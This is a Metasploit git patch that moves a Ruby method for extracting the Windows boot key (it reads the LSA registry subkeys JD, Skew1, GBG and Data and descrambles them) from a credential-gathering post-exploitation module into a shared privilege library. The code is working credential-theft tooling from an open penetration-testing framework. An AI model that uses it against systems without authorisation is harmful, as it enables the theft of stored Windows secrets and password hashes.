From 1a85bd22a8f92be08d86df1db00f00b351e44624 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:46:15 -0400
Subject: [PATCH] move capture_boot_key to post win priv

---
 lib/msf/core/post/windows/priv.rb             | 25 +++++++++++++++++++
 .../post/windows/gather/credentials/lsa.rb    | 21 ----------------
 2 files changed, 25 insertions(+), 21 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 22381044f6..689574f20c 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -84,4 +84,29 @@ module Msf::Post::Windows::Priv
     end
   end
 
+  #
+  # Returns the unscrambled bootkey
+  #
+  def capture_boot_key
+    bootkey = ""
+    basekey = "System\\CurrentControlSet\\Control\\Lsa"
+
+    %W{JD Skew1 GBG Data}.each do |k|
+      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
+      return nil if not ok
+      bootkey << [ok.query_class.to_i(16)].pack("V")
+      ok.close
+    end
+
+    keybytes = bootkey.unpack("C*")
+    descrambled = ""
+    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
+
+    0.upto(keybytes.length-1) do |x|
+      descrambled << [keybytes[descrambler[x]]].pack("C")
+    end
+
+    return descrambled
+  end
+
 end
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 893f7984ba..a807aa3df7 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -29,27 +29,6 @@ class Metasploit3 < Msf::Post
       'Author'          => ['Rob Bathurst <rob.bathurst@foundstone.com>']
     ))
   end
-  def capture_boot_key
-    bootkey = ""
-    basekey = "System\\CurrentControlSet\\Control\\Lsa"
-
-    %W{JD Skew1 GBG Data}.each do |k|
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
-      return nil if not ok
-      bootkey << [ok.query_class.to_i(16)].pack("V")
-      ok.close
-    end
-
-    keybytes = bootkey.unpack("C*")
-    descrambled = ""
-    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
-
-    0.upto(keybytes.length-1) do |x|
-      descrambled << [keybytes[descrambler[x]]].pack("C")
-    end
-
-    return descrambled
-  end
 
   def capture_lsa_key(bootkey)
     begin